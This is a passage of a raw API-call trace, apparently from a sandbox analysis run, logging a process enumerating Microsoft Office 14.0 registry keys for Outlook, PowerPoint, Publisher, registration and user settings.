0x103 [0134.993] RegCloseKey (hKey=0x5ac) returned 0x0 [0134.993] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x4, lpName=0x91283f0, cchName=0x400 | out: lpName="Outlook") returned 0x0 [0134.993] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0134.994] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="Addins") returned 0x0 [0134.994] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Addins", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.994] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.994] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.994] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="AutoDiscover") returned 0x0 [0134.994] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\AutoDiscover", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.994] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="RedirectServers") returned 0x0 [0134.994] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\AutoDiscover\\RedirectServers", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.995] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.995] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.995] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="RedirectServers") returned 0x103 [0134.995] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.995] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91287f8, cchName=0x400 | out: lpName="Display Types") returned 0x0 [0134.995] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Display Types", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.995] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Balloons") returned 0x0 [0134.995] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Display Types\\Balloons", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.996] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.996] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.996] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Balloons") returned 0x103 [0134.996] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.996] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91287f8, cchName=0x400 | out: lpName="Journal") returned 0x0 [0134.996] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Journal", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.996] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.996] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.996] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x4, lpName=0x91287f8, cchName=0x400 | out: lpName="Office Explorer") returned 0x0 [0134.996] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Office Explorer", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.997] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.997] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.997] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x5, lpName=0x91287f8, cchName=0x400 | out: lpName="Options") returned 0x0 [0134.997] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Options", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.997] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Calendar") returned 0x0 [0134.997] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Options\\Calendar", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.997] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.997] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.998] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="MSHTML") returned 0x0 [0134.998] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Options\\MSHTML", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.998] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="International") returned 0x0 [0134.998] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Options\\MSHTML\\International", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.998] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.998] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.998] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="International") returned 0x103 [0134.998] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.998] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="ToDoBar") returned 0x0 [0134.999] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Options\\ToDoBar", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.999] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.999] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.999] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x3, lpName=0x9128c00, cchName=0x400 | out: lpName="ToDoBar") returned 0x103 [0134.999] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.999] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x6, lpName=0x91287f8, cchName=0x400 | out: lpName="Perf") returned 0x0 [0134.999] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Perf", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.999] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="RoamingStreamsCache") returned 0x0 [0134.999] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Perf\\RoamingStreamsCache", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.000] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="F230E11936B7D740A008FFC660E83C71") returned 0x0 [0135.000] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Perf\\RoamingStreamsCache\\F230E11936B7D740A008FFC660E83C71", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.000] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.000] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.000] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="F230E11936B7D740A008FFC660E83C71") returned 0x103 [0135.000] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.000] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="RoamingStreamsCache") returned 0x103 [0135.000] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.000] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x7, lpName=0x91287f8, cchName=0x400 | out: lpName="Preferences") returned 0x0 [0135.000] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Preferences", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.001] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.001] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.001] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x8, lpName=0x91287f8, cchName=0x400 | out: lpName="Resiliency") returned 0x0 [0135.001] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Resiliency", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.001] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="DisabledItems") returned 0x0 [0135.001] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Resiliency\\DisabledItems", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.001] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.001] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.001] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="DisabledItems") returned 0x103 [0135.002] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.002] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x9, lpName=0x91287f8, cchName=0x400 | out: lpName="Search") returned 0x0 [0135.002] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Search", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.002] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Catalog") returned 0x0 [0135.003] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Search\\Catalog", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.003] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.003] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.003] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Catalog") returned 0x103 [0135.003] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.003] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xa, lpName=0x91287f8, cchName=0x400 | out: lpName="Setup") returned 0x0 [0135.003] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Setup", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.003] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.004] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.004] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xb, lpName=0x91287f8, cchName=0x400 | out: lpName="SQM") returned 0x0 [0135.004] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\SQM", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.004] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.004] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.004] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xc, lpName=0x91287f8, cchName=0x400 | out: lpName="UserInfo") returned 0x0 [0135.004] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\UserInfo", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.004] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.004] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.004] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xd, lpName=0x91287f8, cchName=0x400 | out: lpName="UserInfo") returned 0x103 [0135.005] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.005] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x5, lpName=0x91283f0, cchName=0x400 | out: lpName="PowerPoint") returned 0x0 [0135.005] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.005] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="File MRU") returned 0x0 [0135.005] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.005] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.005] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.005] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="First Run") returned 0x0 [0135.006] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\First Run", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.006] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.006] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.006] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91287f8, cchName=0x400 | out: lpName="Options") returned 0x0 [0135.006] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Options", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.006] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.006] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.006] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91287f8, cchName=0x400 | out: lpName="Place MRU") returned 0x0 [0135.006] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Place MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.007] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.007] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.007] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x4, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x0 [0135.007] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.007] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="ProtectedView") returned 0x0 [0135.007] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.007] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.007] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.008] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Locations") returned 0x0 [0135.084] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\Trusted Locations", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.084] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="Location0") returned 0x0 [0135.084] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\Trusted Locations\\Location0", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.085] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.085] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.085] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="Location1") returned 0x0 [0135.085] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\Trusted Locations\\Location1", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.085] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.085] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.085] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x2, lpName=0x9129008, cchName=0x400 | out: lpName="Location2") returned 0x0 [0135.085] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\Trusted Locations\\Location2", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.086] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.086] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.086] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x3, lpName=0x9129008, cchName=0x400 | out: lpName="Location3") returned 0x0 [0135.086] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\Trusted Locations\\Location3", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.086] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.086] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.086] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x4, lpName=0x9129008, cchName=0x400 | out: lpName="Location3") returned 0x103 [0135.087] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.087] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Locations") returned 0x103 [0135.087] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.087] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x5, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x103 [0135.087] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.087] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x6, lpName=0x91283f0, cchName=0x400 | out: lpName="Project") returned 0x0 [0135.087] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Project", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.087] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.087] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.087] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x7, lpName=0x91283f0, cchName=0x400 | out: lpName="Publisher") returned 0x0 [0135.088] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.088] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="BusinessInfo") returned 0x0 [0135.088] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher\\BusinessInfo", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.088] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.088] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.088] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="File MRU") returned 0x0 [0135.088] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.089] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher\\FirstRun", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.089] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher\\Preferences", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.089] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.090] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.090] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Publisher\\Tracking Data", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.090] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.090] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.090] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.090] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.090] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{47A5840C-8124-4A1F-A447-50168CD6833D}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.091] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.091] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{6F327760-8C5C-417C-9B61-836A98287E0C}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.091] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.091] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{71AF7E84-93E6-4363-9B69-699E04E74071}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.091] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.091] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{90140000-0011-0000-0000-0000000FF1CE}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.092] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.092] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{91140000-0011-0000-1000-0000000FF1CE}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.092] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.094] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{91140000-003B-0000-1000-0000000FF1CE}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.094] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.123] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{91140000-0057-0000-1000-0000000FF1CE}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.140] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.142] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Registration\\XDUWTFONO\\{D0A97E12-08A1-4A45-ADD5-1155B204E766}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.155] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.156] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.156] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.156] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.176] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\AccessDE_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.248] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.248] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Access_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.248] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.248] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Ace_OdbcCurrentUser", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.248] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.249] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Excel_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.249] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.249] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Excel_Intl", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.249] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.249] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Global_Project_ClientCore", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.249] RegCloseKey (hKey=0x5b0) returned 0x0 